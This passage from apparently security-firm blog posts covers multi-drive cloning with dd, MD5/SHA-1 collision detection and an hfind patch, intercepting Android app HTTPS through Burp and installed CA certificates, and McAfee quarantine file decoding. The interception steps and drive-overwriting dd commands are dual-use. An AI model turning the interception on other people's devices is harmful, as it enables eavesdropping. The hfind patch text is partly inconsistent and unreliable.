[ 982.256749] sd 3:0:0:0: [sdb] Assuming drive cache: write through
[ 982.276716] sd 3:0:0:0: [sdb] No Caching mode page present
[ 982.276719] sd 3:0:0:0: [sdb] Assuming drive cache: write through
[ 982.278560] sdb: sdb1
[ 982.291142] sd 3:0:0:0: [sdb] No Caching mode page present
[ 982.291145] sd 3:0:0:0: [sdb] Assuming drive cache: write through
[ 982.291148] sd 3:0:0:0: [sdb] Attached SCSI removable disk




fdisk -l - partition table manipulator and viewer


fdisk with the -l option (lower case L) will list the devices as shown:
 Disk /dev/sdb: 4007 MB, 4007264256 bytes
74 heads, 10 sectors/track, 10576 cylinders
Units = cylinders of 740 * 512 = 378880 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier:

Device Boot Start End Blocks Id System
/dev/sdb1 * 11 10577 3909312 b W95 FAT32




Executing the foo


Once you have determined the number of drives detected and how they are to be referenced, you are ready to execute the foo. Make sure you do not switch around the source (if) and destination (of) as defined below. For example, if you have 2 drives you are imaging, it may look something like this:

Originating drive: /dev/sdf
First drive: /dev/sdd
Second drive: /dev/sde
 root@box:~# dd if=/dev/sdf |pv| tee >(dd of=/dev/sdd bs=16M) | dd of=/dev/sde bs=16M





Syntax explanation:
dd = program used to duplicate
if = input file (source drive)
of = output file (destination drive)
pv = pipe viewer (for copying statistics)
tee = program used to redirect input and output
bs = option of dd to control blocksize – could be adjusted for potential speed increase

If you have 4 drives you are imaging, it may look something like this:

Originating drive: /dev/sdd
First drive: /dev/sde
Second drive: /dev/sdf
Third drive: /dev/sdg
Fourth drive: /dev/sdh

 root@box:~# dd if=/dev/sdd |pv| tee >(dd of=/dev/sde bs=16M) >(dd of=/dev/sdf bs=16M) >(dd of=/dev/sdg bs=16M) | dd of=/dev/sdh bs=16M



Performance

Duplication performance will vary depending on the setup; however, in the next article we will reveal how our different setups did and hopefully extract some useful information that may save you time and money.

Overall results

The command syntax above worked great for us and duplicated over 100 drives with no issues at all—most of the time duplicating up to 7 drives simultaneously. We realize that there are many ways to get the job done—if you have other commands, tools, or parameter adjustments that worked well for you, we would love to hear about them.


Detecting File Hash Collisions

$
0
0
By Pär Österberg Medina.

When investigating a computer that is suspected of being involved in a crime or that might be infected with malware, it is important to try to remove as many known files as possible in order to keep the focus of the analysis on the files you have not seen or analyzed before. This is particularly useful in malware forensics when you are looking for something out of the ordinary, something you might not have seen before. In order to remove files from the analysis, a cryptographic checksum of each file is generated and matched against a hash database. These hash databases are divided up into categories with files that are either known to be good, used, forbidden or bad.

Another common use of hash functions in computer forensics is to verify the integrity of an acquired hard drive image or any other piece of data. A cryptographic hash of the data is generated when the evidence is acquired that can later be used to verify that the content has not changed. Even though newer hash functions exist, in computer forensics we are still relying on MD5 and SHA-1. These hash functions were written a long time ago and have flaws that can be used to generate something called hash collisions. In this blog post I will show how these collisions can be detected so we can still use our old trustworthy hash functions - even though they are broken.

Hash Collision

You have most likely heard about hash collisions before and how they can be used for malicious intent. Briefly explained, a collision attack is when two files or messages produce the same hash even though their contents are different. To illustrate how this can look, I have generated what on the surface seem to be two identical programs.

pmedina@forensic:~$ wc -c prg1 prg2
9054 prg1
9054 prg2
18108 total
pmedina@forensic:~$ md5sum prg1 prg2
850d1dc3d24f0ea753a7ee1d5d8bbea9 prg1
850d1dc3d24f0ea753a7ee1d5d8bbea9 prg2



The files above have the same size and produce the same MD5 checksum. However, when we execute the programs, they produce completely different results.

pmedina@forensic:~$ ./prg1
Let me see your identification.
pmedina@forensic:~$ ./prg2
These aren't the droids you're looking for



Detecting Hash Collisions

In the example above I showed two files that both had the same size and shared the same MD5 checksum. Even though there are documented collision attacks against both the MD5 and SHA-1 hash functions, it is highly unlikely that a collision will occur on multiple hash functions at the same time. As you can see below, the files do not produce the same SHA-1 checksum and are therefore considered to be unique.
pmedina@forensic:~$ sha1sum prg1 prg2
a246766fc497e4d6ed92c43a22ee558b3415946a prg1
b9c22ad10b61009193aa8b312c6ec88f44323119 prg2



The danger of white listing files and removing them from a forensic investigation is that you have to be absolutely sure that the files you are excluding from analysis are exactly the files you want to remove. Even though there has been no public demonstration of a second-preimage attack - an attack where a new file is generated to produce the same hash as an existing file - I always like to be extra careful when removing files that generate matches in my hash databases. To verify that the files are indeed the same file is something that can be done by mapping a hash to another hash - a technique I call "hashmap".

Hashmap'ing a hash database

In order for us to be able to hashmap a hash database, the database needs to include at least two hashes created using two different hash functions. Fortunately for us, the databases we generated that are using the RDS format, as well as the NSRL databases we downloaded from NIST, both list the MD5 and SHA-1 hash in each entry. I have previously shown how the program ‘hfind’ can be used both to create an index from a database and to use that index to search the database. When ‘hfind’ finds a match for a hash we search for, the program will print the filename of the file that matched the hash.

pmedina@forensic:~$ md5sum /files/RedDrive.zip
2e54d3fb64ff68607c38ecb482f5fa25 /files/RedDrive.zip
pmedina@forensic:~$ hfind /tmp/example-rds-unique.txt 2e54d3fb64ff68607c38ecb482f5fa25
2e54d3fb64ff68607c38ecb482f5fa25 RedDrive.zip



This functionality of ‘hfind’ is something we can use when we want to hashmap a MD5 hash to the SHA-1 hash of the same file. In order for this to work, we need to replace the value in the database that holds the filename with the SHA-1 checksum of the file. This can be done in many ways but to demonstrate this I will use the Unix command ‘awk’ on one of the hash databases I have generated before.

pmedina@forensic:~$ head -1 /tmp/example-rds-unique.txt > /tmp/example-rds-unique-hm-sha1.txt
pmedina@forensic:~$ tail -n +2 /tmp/example-rds-unique.txt | awk -F, '{print $1","$2","$3","tolower($1)","$5","$6","$7","$8}' >> /tmp/example-rds-unique-hm-sha1.txt
pmedina@forensic:~$ head -3 /tmp/example-rds-unique-hm-sha1.txt
"SHA-1","MD5","CRC32","FileName","FileSize","ProductCode","OpSystemCode","SpecialCode"
"000e9b6b962bdbcd5b0ff01635a417cce833490e","b0efd5eacfe6f1e251b8870d486326af","c8f43198","000e9b6b962bdbcd5b0ff01635a417cce833490e",96,0,"WIN",""
"001121f9dc35ab520b207908f0f26c48979ed497","6efca4942c73ab0b17875fd729b2d03a","2e929525","001121f9dc35ab520b207908f0f26c48979ed497",72,0,"WIN",""



As you can see, the field that used to hold the filename now holds the SHA-1 checksum of the file instead. Since the offsets to the file entries in our hashmap database are not the same as in the original database, we also need to create a new index.

pmedina@forensic:~$ hfind -i nsrl-md5 /tmp/example-rds-unique-hm-sha1.txt
Index Created



Using our new database to search for the MD5 checksum now prints the SHA-1 hash of the file instead of the file name. We can verify this hash by generating a SHA-1 checksum of the file we are investigating.

pmedina@forensic:~$ hfind /tmp/example-rds-unique-hm-sha1.txt 2e54d3fb64ff68607c38ecb482f5fa25
2e54d3fb64ff68607c38ecb482f5fa25 d9c40dd2f1fb08927e773a0dc70d75fedd71549e
pmedina@forensic:~$ sha1sum /files/RedDrive.zip
d9c40dd2f1fb08927e773a0dc70d75fedd71549e /files/RedDrive.zip



Now we know for sure that the file we have on disk is exactly the same as we have in our database. We can of course also reverse this process to create a hashmap database that will print the MD5 hash when we query the database using a SHA-1 hash.
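For completeness, a sketch of that reverse direction - put the MD5 (field 2) into the filename column instead, build a SHA-1 index, and then query by SHA-1. This simply mirrors the commands above and assumes your hfind build supports the nsrl-sha1 index type:

 pmedina@forensic:~$ head -1 /tmp/example-rds-unique.txt > /tmp/example-rds-unique-hm-md5.txt
pmedina@forensic:~$ tail -n +2 /tmp/example-rds-unique.txt | awk -F, '{print $1","$2","$3","tolower($2)","$5","$6","$7","$8}' >> /tmp/example-rds-unique-hm-md5.txt
pmedina@forensic:~$ hfind -i nsrl-sha1 /tmp/example-rds-unique-hm-md5.txt
pmedina@forensic:~$ hfind /tmp/example-rds-unique-hm-md5.txt d9c40dd2f1fb08927e773a0dc70d75fedd71549e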

Modifying ‘hfind’ to hashmap automatically

Generating a new hash database that holds the hash value you want to map to in the data field for the file name is a solution that works. The solution however is not that flexible, and it requires a lot of extra disk space since the hashmap database will be at least the same size as the original database and the index approximately a third of the database size. Instead of trying to work around the issue of ‘hfind’ only printing the field that holds the file name, a much better solution to our problem would be to patch the program so it will present us with the corresponding MD5/SHA-1 hash instead.

To do so, the first thing we need to do is download The Sleuth Kit, verify the downloaded file and extract the content. At the time of this writing, the latest stable version of TSK is 3.2.3.

pmedina@forensic:~$ tar -zxf sleuthkit-3.2.3.tar.gz
pmedina@forensic:~$ cd sleuthkit-3.2.3/



The next step is to run the ‘configure’ program to verify that all dependencies are installed and that all the programs that are required to compile the code are in place.

pmedina@forensic:~/sleuthkit-3.2.3$ ./configure
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... no
checking for mawk... mawk
..
..
config.status: creating tools/timeline/Makefile
config.status: creating tests/Makefile
config.status: creating samples/Makefile
config.status: creating man/Makefile
config.status: creating tsk3/tsk_config.h
config.status: executing depfiles commands
config.status: executing libtool commands
config.status: executing tsk3/tsk_incs.h commands
pmedina@forensic:~/sleuthkit-3.2.3$



The source code that handles the way ‘hfind’ prints the results when processing a database that is using the NSRL2 format is located in the file ‘tsk3/hashdb/nsrl_index.c’. This is the file that we need to patch so that ‘hfind’ will print the SHA1 and MD5 checksum instead of the filename.

pmedina@forensic:~/sleuthkit-3.2.3$ mv tsk3/hashdb/nsrl_index.c tsk3/hashdb/nsrl_index.c.ORIG
pmedina@forensic:~/sleuthkit-3.2.3$ cat ../nsrl_index.c.patch
172,174c172
< &str[1 + TSK_HDB_HTYPE_SHA1_LEN + 3 +
< TSK_HDB_HTYPE_MD5_LEN + 3 + TSK_HDB_HTYPE_CRC32_LEN +
< 3];
---
> &str[1 + TSK_HDB_HTYPE_SHA1_LEN + 3];
331,333c329
< &str[1 + TSK_HDB_HTYPE_SHA1_LEN + 3 +
< TSK_HDB_HTYPE_MD5_LEN + 3 + TSK_HDB_HTYPE_CRC32_LEN +
< 3];
---
> &str[1];
pmedina@forensic:~/sleuthkit-3.2.3$ patch tsk3/hashdb/nsrl_index.c.ORIG -i ../nsrl_index.c.patch -o tsk3/hashdb/nsrl_index.c
patching file tsk3/hashdb/nsrl_index.c.ORIG
pmedina@forensic:~/sleuthkit-3.2.3$




We also need to make sure that an error is returned if we are trying to use our patched ‘hfind’ binary on any database type other than the one using the NSRL2 format. This is done by patching the file ‘tsk3/hashdb/tm_lookup.c’.

pmedina@forensic:~/sleuthkit-3.2.3$ cat ../tm_lookup.c.patch
1022c1022
< if (dbtype != 0) {
---
> /* if (dbtype != 0) { */
1024c1024
< tsk_errno = TSK_ERR_HDB_UNKTYPE;
---
> tsk_errno = TSK_ERR_HDB_UNSUPTYPE;
1026c1026
< "hdb_open: Error determining DB type (MD5sum)");
---
> "hdb_open: hashmap cannot work on DB type (MD5sum)");
1028c1028
< }
---
> /* } */
1032c1032
< if (dbtype != 0) {
---
> /* if (dbtype != 0) { */
1034c1034
< tsk_errno = TSK_ERR_HDB_UNKTYPE;
---
> tsk_errno = TSK_ERR_HDB_UNSUPTYPE;
1036c1036
< "hdb_open: Error determining DB type (HK)");
---
> "hdb_open: hashmap cannot work on DB type (HK)");
1038c1038
< }
---
> /* } */
pmedina@forensic:~/sleuthkit-3.2.3$ mv tsk3/hashdb/tm_lookup.c tsk3/hashdb/tm_lookup.c.ORIG^C
pmedina@forensic:~/sleuthkit-3.2.3$ patch tsk3/hashdb/tm_lookup.c.ORIG -i ../tm_lookup.c.patch -o tsk3/hashdb/tm_lookup.c
patching file tsk3/hashdb/tm_lookup.c.ORIG
pmedina@forensic:~/sleuthkit-3.2.3$



Everything that is needed to modify ‘hfind’ is done and we can compile and test our binary.

pmedina@forensic:~/sleuthkit-3.2.3$ make
Making all in tsk3
..
..
make[1]: Entering directory `/home/pmedina/sleuthkit-3.2.3/tsk3'
Making all in man
make[1]: Entering directory `/home/pmedina/sleuthkit-3.2.3/man'
make[1]: Nothing to be done for `all'.
make[1]: Leaving directory `/home/pmedina/sleuthkit-3.2.3/man'
make[1]: Entering directory `/home/pmedina/sleuthkit-3.2.3'
make[1]: Nothing to be done for `all-am'.
make[1]: Leaving directory `/home/pmedina/sleuthkit-3.2.3'
pmedina@forensic:~/sleuthkit-3.2.3$ sudo cp tools/hashtools/hfind /usr/local/bin/hashmap
pmedina@forensic:~/sleuthkit-3.2.3$ cd ..
pmedina@forensic:~$ hashmap /tmp/example-rds-unique.txt 2e54d3fb64ff68607c38ecb482f5fa25
2e54d3fb64ff68607c38ecb482f5fa25 d9c40dd2f1fb08927e773a0dc70d75fedd71549e
pmedina@forensic:~$ hashmap /tmp/example-rds-unique.txt d9c40dd2f1fb08927e773a0dc70d75fedd71549e
d9c40dd2f1fb08927e773a0dc70d75fedd71549e 2e54d3fb64ff68607c38ecb482f5fa25
pmedina@forensic:~$



As you can see above, instead of returning the name of the file that we find in our hash database, we are given the other half of the MD5-to-SHA-1 or SHA-1-to-MD5 mapping. With this solution, we do not need to create an additional database and can use the existing index that we already have created.

Proxying Android 4.0 ICS and FS Cert Installer

By Paul Ambrosini.

The first step to testing Android applications is to inspect the application’s traffic. If the application uses SSL encryption, this requires forcing the app to use an intermediate proxy that allows us to grab, inspect, and possibly modify this traffic. Before Android 4.0 (Ice Cream Sandwich or “ICS”) was released, proxying an application was painful; the emulator was a better solution than a physical phone due to SSL certificate issues. Now that ICS is out and many devices have a working build (either from the manufacturer or third-party), it has become much easier to use an actual phone to test Android applications.

While testing Android applications, it quickly becomes apparent that the OS doesn't proxy traffic easily. Since most developers don't use the emulator and code must be specifically written for the emulator, proxying on the emulator can pose additional challenges- namely that the application simply might not work at all, or might not work properly. The --http-proxy setting used for the emulator tends to only work for the stock browser application; other applications generally ignore this setting. The second challenge is that a rooted emulator image is needed, which is possible but yet more effort. It’s ironically easier to root most physical devices than it is to root the standard emulator images (let alone to produce a new pre-rooted image.)
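For reference, the emulator proxy setting mentioned above is passed on the command line when launching an AVD (the AVD name here is just an example), and, again, generally only the stock browser honors it:

 $ emulator -avd TestAVD -http-proxy http://127.0.0.1:8080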

There are multiple solutions to this problem, but the best solution I've come across is using the “ProxyDroid” app directly on a rooted ICS phone. This allows a tester to easily forward all traffic from the real application through a proxy; the only problem becomes SSL certificates, since the proxy will need to use its own SSL certificate, which Android will not recognize as valid.

For reference, here’s my phone setup (today - Kernel and ROM are regularly updated):


The rooting process is out of the scope of this article, but documentation can usually be found online. The process varies wildly from phone to phone. A good place to start would be the XDA Developer Forums; most devices have a forum dedicated to them, with a General section that usually contains a rooting guide. Rooting your device is your choice- I can't help with (or be held responsible for) issues that arise from a rooted phone.

In Android, unlike iOS, there is no setting for proxying traffic. Android 4.0 (ICS) added some tweaks to the wireless settings that are (slightly) hidden behind a long press on the currently-connected Wi-Fi network and then a check box for advanced options as seen below. (The “beware of Leopard” sign was dropped early in the Beta process.)



Unfortunately, this proxy setting is just like the --http-proxy setting of the emulator, which means it is completely useless for the actual proxying of applications. This leaves testers with the best option being a rooted phone with ProxyDroid running, which will force all traffic to use the proxy. Install the application from Google Play or from the developer’s XDA Developers thread. This will not solve all cases, but most applications will happily comply.

You'll also need an intercepting proxy running on a computer on the same network (or accessible via the Internet, though this is probably a bad idea). This article uses the free version of Burp Suite running on a BackTrack 5 VM, but if you have a preferred intercepting proxy, it should work, too.

Initial proxy setup

A BackTrack VM has all the needed tools in this case, so Burp was started from the BT5 VM. The VM was set to bridged mode so as to be on the same network as the phone's wireless network. The Burp proxy options were as shown here:



Take note of the IP address of the VM as this will be needed soon. Pay particular attention to Burp's server SSL certificate options, as they will be important later.

Next, start ProxyDroid on the mobile device and allow it root privileges when asked. ProxyDroid requires root, since it uses iptables (the Linux firewall) to modify packet routing on the device. Set ProxyDroid’s Host to the Burp IP and the configured port (default 8080) and then enable the proxy.
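Under the hood this boils down to NAT redirection of outbound web traffic. Conceptually it is something along these lines - a simplification of what ProxyDroid actually inserts, shown only to illustrate the idea, and it assumes a proxy (such as Burp in invisible/transparent mode) listening at 192.168.1.10:8080:

 # redirect outgoing HTTP/HTTPS to the intercepting proxy
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 192.168.1.10:8080
iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 192.168.1.10:8080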



Finally, test proxying with the basic browser on the phone. Browse to something simple like http://www.google.com and the traffic should show up in Burp.



If there is no traffic showing, ensure the proxy is configured to listen on all interfaces (i.e., that “loopback only” is disabled) and that the IP/port settings in ProxyDroid are correct. If these settings seem correct, verify that the phone’s Wi-Fi is set to the same network as the machine running Burp. ProxyDroid should also be checked to make sure the IP/port settings are correct and that the app is enabled. When ProxyDroid is enabled, a cloud icon will show in the top left of the phone to let you know that it’s running.

With the phone's browser now set to proxy through Burp, let's test what happens with an SSL encrypted connection to Google; navigate to https://www.google.com.



Pressing OK and then Continue will allow the browser to ignore the certificate warnings and load the page. Now we can see the browser’s SSL traffic, but what happens if an application attempts to access an HTTPS site?

Application Proxying

In order to test application proxying, we need an application. I've created a very simple app that creates an HTTPS connection to Foundstone’s website. The app will attempt to connect; if it succeeds, it will change the text in the app to the html response source. If not, the application will print a debug message to the log.

The application can be downloaded from here, which will require that your phone allows non-market apps (Settings > Security > Unknown Sources) to be installed on your device:


The source code can be seen here (in case you don’t trust me):


To fully understand how this application works, I would suggest loading the source code in Eclipse (with the ADT Plug-in) and running the code from there. For this test, it’s helpful to be able to view the phone’s system log, either using an attached computer with the Android SDK installed, or a specialized application on the device (for which there are many options).

First, let's start ‘adb logcat’ with a filter for “FS”. A debug log tag is commonly used to find specific log messages that are sent by the application. The test app uses the tag “FSFSFSFSFSFSFSFSFS”, so filtering for FS will do.

Windows command:
adb logcat | findstr FS



Linux command:
adb logcat | grep FS



Here's what the install result looks like when using Linux:
$ adb logcat | grep FS
W/ActivityManager( 3841): No content provider found for permission revoke: file:///data/local/tmp/FS SSL App Test.apk



In another terminal, install the application. This command should be the same in either Windows or Linux, as long as adb is in the path.

$ adb install FS\ SSL\ App\ Test.apk
239 KB/s (10513 bytes in 0.042s)
pkg:/data/local/tmp/FS SSL App Test.apk
Success



With the application installed and logcat running, let's first turn off ProxyDroid and test the application. The application should produce several log messages in the logcat window. These messages are for debug purposes to help step through testing of the application. The application will also change its text to the response received from the server, as shown below.



Now that we can see the application working, it's time to figure out how to insert our proxy in front of the application. Go back and enable ProxyDroid once again. Attempting to run the application again with ProxyDroid turned on causes an SSL error:
$ adb logcat | grep FSFS
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting application...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting HTTPS request...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Set URL...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Open Connection...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Get the input stream...
D/FSFSFSFSFSFSFSFSFS(31187): [-] EXCEPTION: javax.net.ssl.SSLHandshakeException: java.security.cert.CertPathValidatorException: Trust anchor for certification path not found.



The detailed error is:
EXCEPTION: javax.net.ssl.SSLHandshakeException: java.security.cert.CertPathValidatorException: Trust anchor for certification path not found.



“Trust anchor” in this instance is referring to a pre-accepted CA certificate that can be used to validate the SSL certificate. In other words, the certificate is not signed by a valid CA. This is not unexpected- Burp Suite has generated the certificate and signed it using its internal, randomly-generated CA certificate.

By configuring Firefox to use Burp as its proxy, we can easily see what the certificate chain looks like. Navigate to an SSL-protected page, select Tools -> Page Info, click the ‘Security’ icon in the top row, and then click the ‘View Certificate’ button. You should be presented with a screen like that below.



As the image shows, “PortSwigger CA” is the signing authority for the certificate for “www.foundstone.com”. The phone doesn't have this CA (not least because it’s randomly generated on first run by Burp Suite), so we need to add it, which will allow us to decrypt SSL traffic sent by our Android apps.

Still in Firefox, switch to the Details tab, select “PortSwigger CA” in the “Certificate Hierarchy” tree, and then click “Export”. Export the file as an X.509 Certificate (DER) file and set the filename to PortSwiggerCA.cer. Android only reads X.509 certificate files with a .CER extension when loading certificates from the SD card.



Finally, push the .CER file to the phone’s SD card using adb push, just like with any other file:
$ adb push PortSwiggerCA.cer /sdcard/
30 KB/s (712 bytes in 0.23s)



With the certificate file saved on the phone, install it into the certificate pool by navigating to Settings -> Security -> Install from SD card. The install process will prompt you for the device lock code, as this is what Android uses to help secure the certificate. If there is no lock code or pin currently configured, you will be asked to create one.

Now that the CA certificate is installed on the phone, attempt to run the test application again, and observe the output in logcat.
$ adb logcat | grep FSFS
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting application...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting HTTPS request...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Set URL...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Open Connection...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Get the input stream...
D/FSFSFSFSFSFSFSFSFS(31187): [-] EXCEPTION: java.io.IOException: Hostname 'www.foundstone.com' was not verified



The detailed error is:
EXCEPTION: java.io.IOException: Hostname 'www.foundstone.com' was not verified



Your first thought might be to go back to Firefox and grab the “www.foundstone.com” certificate from the Details tab, in the same manner that we obtained the PortSwigger CA certificate, but that actually won't work. It appears that the default HttpsURLConnection in Android can sometimes cause an exception when using the default HostnameVerifier. Searching for this issue I found some info here which talks about just using a different HostnameVerifier. Depending on the application this could cause an exception or be completely ignored; in my case, my application used the default verifier and I would have to install a site certificate as well.

The easiest fix from the tester perspective is to reconfigure Burp to use a fixed certificate. Go back to Burp and edit the settings for the proxy listener. In the “server SSL certificate” section, select the option “generate a CA-signed certificate with a specific hostname.” The specific hostname for this test will be “www.foundstone.com”. Be sure to click “edit” prior to making the change and “update” afterwards. Just prior to clicking “update,” Burp should look similar to the image below.



Return to Firefox and refresh the https://www.foundstone.com page; a new certificate error should appear. Follow the same process as above to export the certificate, except that this time be sure to export the “www.foundstone.com” certificate instead of the “PortSwigger CA” certificate. Remember to change the format to X.509 Certificate (DER) and to save it with a .CER extension (for example, www.foundstone.com.cer).

$ adb push www.foundstone.com.cer /sdcard/
11 KB/s (616 bytes in 0.051s)



As before, navigate to Settings -> Security -> Install from SD card and install the www.foundstone.com certificate.

Finally, double-check that ProxyDroid is still running, then run the test application again.

$ adb logcat | grep FSFS
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting application...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting HTTPS request...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Set URL...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Open Connection...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Get the input stream...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Create a buffered reader to read the response...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Read all of the return....
D/FSFSFSFSFSFSFSFSFS(31187): [+] SUCCESS
D/FSFSFSFSFSFSFSFSFS(31187): [+] SUCCESS
D/FSFSFSFSFSFSFSFSFS(31187): [+] SUCCESS




After a successful run, the Android application should display the HTML loaded from the page.



Burp will show the site being connected to by IP, as shown below.



Success!

Some notes

Where do we go from here? We were able to successfully proxy traffic for this test application, but actual applications may present other difficulties. When testing any application, some key pieces of information will be required, the most important being which URL the application talks to. In this example we used “www.foundstone.com” and, thus, created a specific host certificate for this site. For each new application and URL, Burp will need to be reconfigured to generate a site-specific certificate for the URL in use.

One other way to deal with this proxying issue is to decompile the application and do code replacement before recompiling the application. Foundstone provides an example application, part of its Hacme series, and also some documentation on performing class replacement. Performing class replacements like this can be tedious and frustrating, however, so it should be considered only in cases where the application cannot be coerced to proxy via more usual means.

A Better Way - FS Cert Installer

After going through this a couple of times I didn’t want to deal with installing the certificates over and over, so I wrote a small application to handle installing them. The application takes the URL, proxy IP and proxy port, and then allows the user to install the CA or site certificate. For the “hostname was not verified” issue, Burp will still need to be changed before the certificate is installed.



Download:

Usage instructions:
  1. Install the application using the market or the apk file from github.
  2. Set the URL, proxy IP and proxy port.
  3. Install the CA certificate, which will most likely be the Burp certificate. Name it anything and enter the lock PIN or pattern used on the phone. The PIN or pattern is used here by the KeyChain activity, not the installer app (see the sketch after this list).
  4. Change the certificate on Burp to generate a certificate with a specific hostname. Install the site certificate.
  5. Test your application!
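For those curious what the installer is doing, handing a certificate to Android programmatically goes through the system KeyChain install intent. The following is a simplified sketch of that call, not the actual FS Cert Installer source; the certificate bytes and the display name are placeholders:

import android.app.Activity;
import android.content.Intent;
import android.security.KeyChain;

public class CertInstallSketch {
    // Hand a DER-encoded X.509 certificate to the system KeyChain activity.
    // The KeyChain activity, not this code, is what prompts for the lock PIN or pattern.
    static void installCertificate(Activity activity, byte[] derEncodedCert) {
        Intent intent = KeyChain.createInstallIntent();
        intent.putExtra(KeyChain.EXTRA_CERTIFICATE, derEncodedCert); // raw X.509 DER bytes
        intent.putExtra(KeyChain.EXTRA_NAME, "Burp CA");             // placeholder display name
        activity.startActivity(intent);
    }
}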


One large issue I ran into while making this application involves testing the certificate chain. The “test certificate chain” button will run the test with or without a proxy (without one if the IP and port are blank). I set up the application this way because a user might be testing or installing certificates with ProxyDroid running, and the application should handle that just fine. The issue arises when a user wants to test the certificate chain after installing only the CA certificate: the application will report that the site certificate is installed and the full certificate chain is working. This is because a connection opened through URL.openConnection(proxy) does not trigger the same hostname-verification IOException as it does without a proxy set. Unfortunately there isn’t a fix for this issue, as far as I’m aware; the code is part of the JDK in javax.net.ssl. I am purposely using this class because it was recommended by the Android developer blog here, and the Apache HttpClient doesn’t throw the error anyway.
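To make the difference concrete, here is a minimal sketch of the two calls being compared. The proxy address is a placeholder, and the behavior noted in the comments is what I observed in this setup rather than a guarantee:

import java.net.InetSocketAddress;
import java.net.Proxy;
import java.net.URL;
import javax.net.ssl.HttpsURLConnection;

public class ChainTestSketch {
    public static void main(String[] args) throws Exception {
        URL url = new URL("https://www.foundstone.com/");
        Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress("192.168.1.10", 8080)); // placeholder proxy

        // Direct connection: reading the stream fails with the
        // "Hostname ... was not verified" IOException until the site certificate is installed.
        HttpsURLConnection direct = (HttpsURLConnection) url.openConnection();

        // Proxied connection: the same read succeeds with only the CA certificate installed,
        // which is why the in-app chain test can be misleading.
        HttpsURLConnection proxied = (HttpsURLConnection) url.openConnection(proxy);

        proxied.getInputStream().close();
        direct.getInputStream().close();
    }
}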

As a final note, some applications won’t need the site certificate, and watching logcat will be the best way to figure out what’s happening. Stack traces are your friend!

UnBup - McAfee BUP Extractor for Linux

By Tony Lee and Travis Rosiek.

These days, antivirus is a must-have due to the ubiquity of adware, malware, viruses, and worms—yes, even if you are running a Mac. ;) Antivirus does a good job catching the low-hanging fruit and other annoyances, but have you ever wondered what happens to the files that the A/V catches? Typically, antivirus engines will deactivate the suspected virus and then store an inert (encoded) copy in a quarantine folder to prevent accidental execution. McAfee’s VirusScan will allow you to restore the binary; however, using VirusScan may not be ideal in all scenarios. This article will take you through the process of recovering the quarantined binary and the metadata surrounding it. But why would you want to do this? Potentially for the following reasons:
  1. You are a corporate A/V administrator and A/V misidentified a user’s file
  2. You are a malware analyst and would like to dissect the detected binary
  3. You are a home user and A/V grabbed a file you wanted (think netcat or a sysinternals tool) and the restore function did not work

As a bonus, at the bottom of the article we have included a bash shell script and a (faster) Perl script to break apart McAfee BUPs from within a Linux environment. We wrote these scripts because we could not find a Linux BUP tool. The tool was prototyped in bash because it was quick to code and removed as many dependencies as possible. Unfortunately, bitwise exclusive OR (XOR) in bash was too slow, so the tool was rewritten in (well-commented) Perl.

In case you are not familiar with the binary operation XOR, a truth table is provided below:
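 A | B | A XOR B
---+---+---------
 0 | 0 |    0
 0 | 1 |    1
 1 | 0 |    1
 1 | 1 |    0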



Note that an output of 1 is only produced for an odd number of 1’s on the input.

How McAfee deactivation works

McAfee VirusScan, like other antivirus engines, will deactivate the binary and store an inert copy in a pre-defined location. McAfee appears to deactivate the binary by doing the following:
  1. Creates a metadata text file
  2. Performs a bitwise XOR on the metadata file and binary with a well-known key (0x6A)
  3. Combines the two encoded files into a single file using Microsoft’s compound document format
  4. Stores the file (with .BUP extension) in a quarantine folder defined by the Quarantine Manager Policy (default is C:\QUARANTINE\)
You can check the path of the quarantine folder by right clicking on the McAfee shield -> VirusScan Console -> Quarantine Manager Policy.
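The XOR step on its own is tiny. As a minimal illustration (not part of the UnBup tool itself), the following Java sketch undoes the 0x6A encoding on a file such as Details or File_0, assuming the compound document has already been unpacked with something like 7-Zip:

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

public class BupXor {
    public static void main(String[] args) throws IOException {
        // args[0] = encoded input (e.g. Details), args[1] = decoded output (e.g. Details.txt)
        try (InputStream in = new FileInputStream(args[0]);
             OutputStream out = new FileOutputStream(args[1])) {
            int b;
            while ((b = in.read()) != -1) {
                out.write(b ^ 0x6A); // undo the single-byte XOR key
            }
        }
    }
}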



Triggering Antivirus to Create a BUP

For this demonstration, we will be using the test file for Global Threat Intelligence (GTI - formerly known as Artemis). This test file is similar to the EICAR antivirus test file, but it triggers a heuristic detection for McAfee VirusScan. You could also use John the Ripper, Cain, netcat, pwdump, or other common hack tools to trigger an A/V event.

You can read more about the test file from the How to verify that GTI File Reputation is installed correctly and that endpoints can communicate with the GTI server McAfee KnowledgeBase article.

A direct link to the test file:

https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/53000/KB53733/en_US/ArtemisTest.zip
The password to unzip the file is: password

If On-Access detection does not detect the file right away, right-click the file and scan it to trigger an On-Demand scan. We disabled On-Access protection in order to run a hash on the binary and provide it for your convenience. SHA1 would normally be preferred since MD5 has a chance of collisions; however, MD5 hashes are sufficient for our purposes in this demo.

 $ md5sum.exe ArtemisTest.exe
5db32a316f079fe7947100f899d8db86 *ArtemisTest.exe



